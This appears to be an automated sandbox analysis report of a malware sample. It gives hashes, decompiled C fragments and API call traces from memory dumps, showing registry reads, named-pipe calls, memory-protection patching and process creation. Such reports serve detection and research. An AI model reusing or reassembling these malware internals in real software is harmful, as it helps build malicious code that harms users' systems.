Opcode ID: b77d991e674adab118fb39c889384f2d6d6cb50cd6c75dac117ded9dc44ef817
Instruction ID: d5cf69504266ef097228e3a66b9eaaf6ec56074f4530c96a876ead2222834ff9
Opcode Fuzzy Hash: b77d991e674adab118fb39c889384f2d6d6cb50cd6c75dac117ded9dc44ef817
Instruction Fuzzy Hash: 4B313772900119AFCF25DF68C888CABBB7AFBC97447154A98F915DB214E331AD51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02777004, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E02777004(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x277d230; // 0x27ba5a8
				_t2 = _t42 + 0x277e468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x277d230; // 0x27ba5a8
					_t6 = _t45 + 0x277e488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x277d230; // 0x27ba5a8
							_t30 = _v8;
							_t12 = _t48 + 0x277e478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}

0x02777010
0x02777011
0x02777017
0x0277701e
0x02777020
0x02777024
0x02777028
0x0277702a
0x02777033
0x02777039
0x02777041
0x02777043
0x02777047
0x02777049
0x02777056
0x0277705a
0x0277705f
0x02777065
0x0277706a
0x02777072
0x02777074
0x02777076
0x0277707c
0x0277707c
0x0277707f
0x02777085
0x02777085
0x02777088
0x0277708e
0x0277708e
0x02777095

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 02777041
IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 02777072

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: e4a9fd5f277a6e438944858c1e57c2da273876285512d872c3e7af4e3094540b
Instruction ID: 54b8bc235f9c9b01ccb2d3862525e22b1cfcc5c5bfcad13b702fee0abeb7bfef
Opcode Fuzzy Hash: e4a9fd5f277a6e438944858c1e57c2da273876285512d872c3e7af4e3094540b
Instruction Fuzzy Hash: C1213D75A00619AFCB10CFA4C888D9AB779FF88704B148A94F905EB314D771ED41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 054120E9, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0542207B: RegQueryValueExA.KERNELBASE(00000000,05406702,00000000,05406702,00000000,?,00000000,00000000,00000000,00000001,75144D40,?,?,?,05412103,Ini), ref: 054220B3
Part of subcall function 0542207B: RtlAllocateHeap.NTDLL(00000000,?), ref: 054220C7
Part of subcall function 0542207B: RegQueryValueExA.ADVAPI32(00000000,05406702,00000000,05406702,00000000,?,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40), ref: 054220E1
Part of subcall function 0542207B: RegCloseKey.KERNELBASE(00000000,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40,?,?,?,05406702,00000000), ref: 0542210B

HeapFree.KERNEL32(00000000,05406702,00000000,Ini,05406702,00000000,00000001,00000000,75144D40,?,?,?,05406702,00000000,00000000,0540CEBC), ref: 05412177

Part of subcall function 0541C339: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,05405E1D,00000000,00000001,75145519,?,00000000,?,05404731), ref: 0541C35B

Strings

Ini, xrefs: 054120F9

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: Ini
API String ID: 1301464996-1327165576
Opcode ID: ece381fc38158231913a796545e597c743191fa5c00452f8195ba5e7017da9ca
Instruction ID: 67a54ba3fa942b61eea3068d1f4ebc34147d5f44f8628786b8f7eb5f394a6d52
Opcode Fuzzy Hash: ece381fc38158231913a796545e597c743191fa5c00452f8195ba5e7017da9ca
Instruction Fuzzy Hash: F511A379608315ABDB28DA46CD81EFF7BAAEB45750F500077EB01EB240D6F09E01CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0542149E, Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000003,00000000), ref: 054214CE
GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000003,00000000), ref: 05421515

Part of subcall function 05408AC2: HeapFree.KERNEL32(00000000,00000000,05421258,00000000), ref: 05408ACE

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
String ID:
API String ID: 552344955-0
Opcode ID: 44f4c785a94cb5d39ef8236c5883d10eee23fdf40dcc2b14bfcda7943d11b55d
Instruction ID: 9ab38f4a52a05a506af07664adcfd9414f54f5e76fd98dc804d9756efc6cc515
Opcode Fuzzy Hash: 44f4c785a94cb5d39ef8236c5883d10eee23fdf40dcc2b14bfcda7943d11b55d
Instruction Fuzzy Hash: 59118272A00228ABD711DFA9C848BDFBBF9FF91251F6440AEE40597340DBB49A45CB20

Uniqueness

Uniqueness Score: -1.00%

Function 05406699, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,?,?,63699BC3,00000000,0540CEBC,?), ref: 054066D6
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,0540CEBC,?,?), ref: 05406737

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: a42fbcd4faccecb2b158656e66c9a0d673d1f35467469666b791284a5fbdb6c5
Instruction ID: 99a9e9f678681981b5c9ade7c184941336e92a9aa2a701b6a6464cd35984714e
Opcode Fuzzy Hash: a42fbcd4faccecb2b158656e66c9a0d673d1f35467469666b791284a5fbdb6c5
Instruction Fuzzy Hash: 30118F75910218EBCF14DBA1D949BEE7BBCAB04300F50557AFA02E3140CB30DB14DB65

Uniqueness

Uniqueness Score: -1.00%

Function 02775BC3, Relevance: 3.0, APIs: 2, Instructions: 49
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E02775BC3(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t15;
				void* _t21;
				void* _t23;
				signed short* _t24;

				_t23 = E0277745D(0, _a12);
				if(_t23 == 0) {
					_t21 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E02775495(__ecx, _a4, _a8, _t23); // executed
					_t21 = _t15;
					if(_t21 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_push( &_v12);
						 *_t24 = 0x5f;
						_t21 = E02777325(8, _a4, 0x80000001, _a8, _t23);
					}
					HeapFree( *0x277d1f0, 0, _t23);
				}
				return _t21;
			}

0x02775bd6
0x02775bda
0x02775c34
0x02775bdc
0x02775be3
0x02775be9
0x02775bed
0x02775bf2
0x02775bf6
0x02775bfc
0x02775c05
0x02775c0a
0x02775c1f
0x02775c1f
0x02775c2a
0x02775c2a
0x02775c3b

APIs

Part of subcall function 0277745D: lstrlen.KERNEL32(?,0277D2E0,75187FC0,00000000,0277534B,?,?,?,?,?,027770B5,?), ref: 02777466
Part of subcall function 0277745D: mbstowcs.NTDLL ref: 0277748D
Part of subcall function 0277745D: memset.NTDLL ref: 0277749F

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,75145520,00000000,00000008,00000014,004F0053,04F3931C), ref: 02775BFC
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,75145520,00000000,00000008,00000014,004F0053,04F3931C), ref: 02775C2A

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID:
API String ID: 1500278894-0
Opcode ID: 8c47f0663cd513d371cea0e0f8a162435a69c29323b327cfeb3aa81a0c6068c9
Instruction ID: 2f41a0857d8f32ae00948696ea5ff02c739d160da4f67493d9e9c6a837137d42
Opcode Fuzzy Hash: 8c47f0663cd513d371cea0e0f8a162435a69c29323b327cfeb3aa81a0c6068c9
Instruction Fuzzy Hash: 85018F3264020EBBDF225FA49C48F9A7FB9FF88304F504825FE40AA150EB71D524CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05415B69, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0542207B: RegQueryValueExA.KERNELBASE(00000000,05406702,00000000,05406702,00000000,?,00000000,00000000,00000000,00000001,75144D40,?,?,?,05412103,Ini), ref: 054220B3
Part of subcall function 0542207B: RtlAllocateHeap.NTDLL(00000000,?), ref: 054220C7
Part of subcall function 0542207B: RegQueryValueExA.ADVAPI32(00000000,05406702,00000000,05406702,00000000,?,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40), ref: 054220E1
Part of subcall function 0542207B: RegCloseKey.KERNELBASE(00000000,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40,?,?,?,05406702,00000000), ref: 0542210B

HeapFree.KERNEL32(00000000,00000000,00000000,Scr,00000000,?,?,?,00000000,0540D061,05407134,00000000,00000000), ref: 05415BDB

Part of subcall function 054225F7: StrChrA.SHLWAPI(?,0000002E,00000000,00000000,?,1795F247,05415BBE,00000000,00000004), ref: 05422609
Part of subcall function 054225F7: StrChrA.SHLWAPI(00000004,00000020,?,1795F247,05415BBE,00000000,00000004), ref: 05422618

Part of subcall function 05402661: lstrlen.KERNEL32(05404B43,054160B5,00000000,75145520,?,?,05404B43,00000126,00000000,-00000005,00000000), ref: 05402691
Part of subcall function 05402661: RtlAllocateHeap.NTDLL(00000000,00000000,054160B5), ref: 054026A7
Part of subcall function 05402661: memcpy.NTDLL(00000010,05404B43,00000000,?,?,05404B43,00000126,00000000), ref: 054026DD
Part of subcall function 05402661: memcpy.NTDLL(00000010,00000000,00000126,?,?,05404B43,00000126), ref: 054026F8
Part of subcall function 05402661: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 05402716
Part of subcall function 05402661: GetLastError.KERNEL32(?,?,05404B43,00000126), ref: 05402720
Part of subcall function 05402661: HeapFree.KERNEL32(00000000,00000000,?,?,05404B43,00000126), ref: 05402746

Strings

Scr, xrefs: 05415B76

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
String ID: Scr
API String ID: 730886825-1633706383
Opcode ID: 9cfd1f955a4fbf1f068bb6e5fd7067df62c0cc596763e0020fc21b59631708ea
Instruction ID: 80d43fd3b62598a9387f2d7776b689cc4218e4bfd89abc764c2d768680f0dad6
Opcode Fuzzy Hash: 9cfd1f955a4fbf1f068bb6e5fd7067df62c0cc596763e0020fc21b59631708ea
Instruction Fuzzy Hash: E601DB35614224BBDB219B91CD0DFDF7FBCEF45714F500056B901A3180DAB09911DA65

Uniqueness

Uniqueness Score: -1.00%

Function 05413AA9, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0542E260), ref: 05413AB3
RtlLeaveCriticalSection.NTDLL(0542E260), ref: 05413AEF

Part of subcall function 0540E3A7: lstrlen.KERNEL32(?,?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E3F4
Part of subcall function 0540E3A7: VirtualProtect.KERNEL32(00000000,00000000,00000040,-00000020,?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E406
Part of subcall function 0540E3A7: lstrcpy.KERNEL32(00000000,?), ref: 0540E415
Part of subcall function 0540E3A7: VirtualProtect.KERNEL32(00000000,00000000,?,-00000020,?,00000000,?,0541C89E,0542D4E4,?,00000000,00000004,00000000), ref: 0540E426

Part of subcall function 05408AC2: HeapFree.KERNEL32(00000000,00000000,05421258,00000000), ref: 05408ACE

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
String ID:
API String ID: 1872894792-0
Opcode ID: 7faed0a34c1c6f0393fbba32462774196854ac3c8403481959fe2166a27558e5
Instruction ID: b8fedd465d0ae0814bce970248421674d050a0cf15df406ebe084d93e14b19d1
Opcode Fuzzy Hash: 7faed0a34c1c6f0393fbba32462774196854ac3c8403481959fe2166a27558e5
Instruction Fuzzy Hash: 56F0A7363112349F863C6F199584CFABBADFBD5651355466FE90253300CE725C109A90

Uniqueness

Uniqueness Score: -1.00%

Function 0277A5D1, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x277d1f4) == 0) {
						E0277310C();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x277d1f4) == 1) {
						_t10 = E02778714(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x0277a5d8
0x0277a5d9
0x0277a5dc
0x0277a60e
0x0277a610
0x0277a610
0x0277a5de
0x0277a5df
0x0277a5f4
0x0277a5fb
0x0277a5fd
0x0277a5fd
0x0277a5fb
0x0277a5df
0x0277a618

APIs

InterlockedIncrement.KERNEL32(0277D1F4), ref: 0277A5E6

Part of subcall function 02778714: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 02778729

InterlockedDecrement.KERNEL32(0277D1F4), ref: 0277A606

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: bedaa5f03c0e82f1428b98559ff73fe1c9f047aac9af9cba93479534ad1d13b6
Instruction ID: d35831923b423867f7791231320501f3421ab0b8526c11b1df7132ac3cbb1e94
Opcode Fuzzy Hash: bedaa5f03c0e82f1428b98559ff73fe1c9f047aac9af9cba93479534ad1d13b6
Instruction Fuzzy Hash: 12E04F316441225BBF2216A8CC0CB6EEF519F44B8CB014D38F542D5214E720C490CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 05422E86, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0542411E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 05424157
Part of subcall function 0542411E: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0542418D
Part of subcall function 0542411E: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05424199
Part of subcall function 0542411E: lstrcmpi.KERNEL32(?,00000000), ref: 054241D6
Part of subcall function 0542411E: StrChrA.SHLWAPI(?,0000002E), ref: 054241DF
Part of subcall function 0542411E: lstrcmpi.KERNEL32(?,00000000), ref: 054241F1
Part of subcall function 0542411E: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05424242

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,0542A5B8,0000002C,0541BB38,NTDLL.DLL,6547775A,00000000,05408FF0), ref: 05422EC5

Part of subcall function 05422AAC: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 05422AD5
Part of subcall function 05422AAC: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05415EA3,00000000,00000000,00000028,00000100), ref: 05422AF7

VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,0542A5B8,0000002C,0541BB38,NTDLL.DLL,6547775A,00000000,05408FF0,?,00000318), ref: 05422F50

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
String ID:
API String ID: 4138075514-0
Opcode ID: 1c5225635d7d41c4498321ef76fab22b667adcfbabdc5ffad799386a14c734ff
Instruction ID: e089fa4a4c798cc80bfafe630d047f22ecb467bfce109b7d83715c921c521238
Opcode Fuzzy Hash: 1c5225635d7d41c4498321ef76fab22b667adcfbabdc5ffad799386a14c734ff
Instruction Fuzzy Hash: 4321D275E05238EBCF21DFA6D844ADEBBB5FF08720F51816AF914A2254C3B44A41DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0541C7C8, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(41564441), ref: 0541C7DD

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7ad43eebf5ca0fdc823a87d6abf04004afe84840e3251f9b848549cbdc9ae82c
Instruction ID: 26c087dde6a45254934226aaa2df10f9ca2834f1530b17d603b57605caa3c35d
Opcode Fuzzy Hash: 7ad43eebf5ca0fdc823a87d6abf04004afe84840e3251f9b848549cbdc9ae82c
Instruction Fuzzy Hash: 3D217672E40124EFCB20EFD9CCC5AEE7BB5FB44215F9444ABD90597240DA30AD46CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02778963, Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E02778963(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x277d1f0, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}

0x02778968
0x0277896d
0x0277897b
0x02778981
0x02778985
0x027789f6
0x02778987
0x0277898b
0x0277898e
0x02778991
0x02778998
0x02778999
0x0277899a
0x0277899e
0x027789a1
0x027789a8
0x027789ae
0x027789af
0x027789af
0x027789b6
0x027789b7
0x027789b8
0x027789bc
0x027789c8
0x027789ce
0x027789cf
0x027789cf
0x027789d1
0x027789d7
0x027789d9
0x027789de
0x027789df
0x027789df
0x027789e5
0x027789ee
0x027789f0
0x027789f3
0x02778a02

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0277897B

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: db07bcff974d45c4a9afb7c69dd2bd5f0fe9cb2bf457db5d859abdf7201862cb
Instruction ID: b53ba559e3512088f0aab186ae29a4319bbafac52ac9a6d18dfab7848c1c7260
Opcode Fuzzy Hash: db07bcff974d45c4a9afb7c69dd2bd5f0fe9cb2bf457db5d859abdf7201862cb
Instruction Fuzzy Hash: 331126312853459FEB1A8F2DC859BE9BBA5DF57318F14408EE4809B392C277850BCB61

Uniqueness

Uniqueness Score: -1.00%

Function 0540D659, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,0542D514,00000000,?,?,0541C81B,00000004,00000000), ref: 0540D694

Part of subcall function 05405E8A: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0542E260), ref: 05405EA1

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: acbce2d7239b395801f61849a97454950c0be16a1956fe14b0dde871d8297e05
Instruction ID: b1a4dba73b31422d130dbbe0fd13f279870ac198813db0d7dac715423f1fec5e
Opcode Fuzzy Hash: acbce2d7239b395801f61849a97454950c0be16a1956fe14b0dde871d8297e05
Instruction Fuzzy Hash: B0218171A04644EFDB24CF99C480EEA77A5FF412A0B34587BE94A87390D670E908DB90

Uniqueness

Uniqueness Score: -1.00%

Function 05410FCF, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05411021

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f5d38b070a377954451c607f8f4526fdf2f134e2241b109f20077817393c7411
Instruction ID: 9d843bc156c44ef5b1f8d4f710dfe8db81ba5baacb2f5489974fdfdd536cb35d
Opcode Fuzzy Hash: f5d38b070a377954451c607f8f4526fdf2f134e2241b109f20077817393c7411
Instruction Fuzzy Hash: A6116132604219AFDF158FA9DC409DA7FA9FF08370B058136FE2992260DB32D921DF94

Uniqueness

Uniqueness Score: -1.00%

Function 02773160, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E02773160(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x277d230; // 0x27ba5a8
				_t4 = _t15 + 0x277e394; // 0x4f3893c
				_t20 = _t4;
				_t6 = _t15 + 0x277e124; // 0x650047
				_t17 = E027775D9(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E02777404(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x0277316a
0x0277316c
0x02773173
0x02773174
0x02773175
0x02773176
0x0277317c
0x02773181
0x02773181
0x0277318b
0x0277319d
0x027731a4
0x027731d3
0x027731a6
0x027731ab
0x027731d0
0x027731ad
0x027731b0
0x027731b7
0x027731c2
0x027731b9
0x027731bc
0x027731bc
0x027731c6
0x027731c6
0x027731ab
0x027731da

APIs

Part of subcall function 027775D9: SysFreeString.OLEAUT32(?), ref: 027776B8

Part of subcall function 02777404: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,027776F9,004F0053,00000000,?), ref: 0277740D
Part of subcall function 02777404: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,027776F9,004F0053,00000000,?), ref: 02777437
Part of subcall function 02777404: memset.NTDLL ref: 0277744B

SysFreeString.OLEAUT32(00000000), ref: 027731C6

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 3a8c26491f297e6a2ff7f90546359bd52e9fddfb2f56a99036f1ca69bc101a25
Instruction ID: adb5c8fbe3e572692263cca15a502cc0a8bc0f426fd9a3db399669d13ee4867f
Opcode Fuzzy Hash: 3a8c26491f297e6a2ff7f90546359bd52e9fddfb2f56a99036f1ca69bc101a25
Instruction Fuzzy Hash: 3B017132500529BFDF159FA8CC44DAFBBB9FB05714F0148A5E905E7020E3719A65D7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0277726B, Relevance: 1.5, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0277726B(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E02778963(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x277d230; // 0x27ba5a8
						_t9 = _t17 + 0x277ea08; // 0x444f4340
						_t20 = E02771650( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x277d1f0, 0, _a4); // executed
					}
				}
				return _t26;
			}

0x0277726e
0x02777274
0x027772cb
0x0277727a
0x02777285
0x0277728a
0x0277728e
0x0277729b
0x027772a3
0x027772af
0x027772b7
0x027772c1
0x027772c1
0x0277728e
0x027772d0

APIs

Part of subcall function 02778963: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0277897B

Part of subcall function 02771650: lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 02771684
Part of subcall function 02771650: StrStrA.SHLWAPI(00000000,?), ref: 02771691
Part of subcall function 02771650: RtlAllocateHeap.NTDLL(00000000,?), ref: 027716B0
Part of subcall function 02771650: memcpy.NTDLL(00000000,0000000B,0000000B), ref: 027716C4
Part of subcall function 02771650: memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 027716D3
